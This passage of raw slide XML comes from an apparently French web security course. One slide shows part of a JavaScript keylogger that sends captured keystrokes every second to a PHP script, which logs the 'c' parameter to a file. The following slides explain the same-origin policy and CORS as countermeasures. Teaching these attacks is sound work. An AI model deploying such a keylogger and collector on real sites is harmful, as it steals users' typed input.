              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keys;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     keys </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E9F284"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>''</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 1000);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="ZoneTexte 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6CF8ED2-1D6C-4F7C-A8D1-452A913E367C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6497320" y="3429000"/>
            <a:ext cx="3351530" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;?php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8F8F2"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8BE9FD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>empty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($_GET[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E9F284"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F1FA8C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E9F284"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>])) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  $f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8BE9FD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E9F284"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F1FA8C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>log.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E9F284"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E9F284"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F1FA8C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F1FA8C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E9F284"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8BE9FD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>f,$_GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E9F284"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F1FA8C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E9F284"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8BE9FD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fclose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($f);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8F8F2"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5192215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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2807801" y="2906556"/>
            <a:ext cx="6576398" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les Contre-mesures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37232197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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="685800"/>
            <a:ext cx="10603381" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>SOP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>policy</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EF70AAC-A118-47CE-9ABC-CD7669FEF236}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="1853510"/>
            <a:ext cx="3687373" cy="4093428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="75000"/>
              <a:alpha val="49000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Same</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-Origin Policy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(SOP) interdit le chargement à partir d'autres serveurs lors d’une visite d'un site Web. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Toutes les données doivent provenir de la même source, c'est-à-dire du même serveur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Il s'agit d'une mesure de sécurité, car JavaScript peut charger du contenu provenant d'autres serveurs - même du contenu nuisible – et ce à l'insu de l'utilisateur.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDD14D55-5026-4E23-BDED-63369A8136E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4371584" y="2469063"/>
            <a:ext cx="3687373" cy="3477875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="50000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>De manière générale, lorsque deux ressources embarquées sont issues d’une même Origin, aucune restriction n’est appliquée. À l’inverse, une stratégie de contrôle sera appliquée dans le cas de la communication entre des ressources embarquées d’Origins différentes, c’est-à-dire en Cross-Origin.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="ZoneTexte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44BE8D0D-5CA8-47E5-92EA-2F530332AE8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8058957" y="3716717"/>
            <a:ext cx="3687373" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="50000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>La limitation par défaut de SOP est contournable pour le cas des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>APIs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Fetch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> par la mise en œuvre de Cross-Origin Resource Sharing (CORS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19191821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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="685800"/>
            <a:ext cx="10603381" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Requêtes </a:t>
            </a:r>
            <a:r>
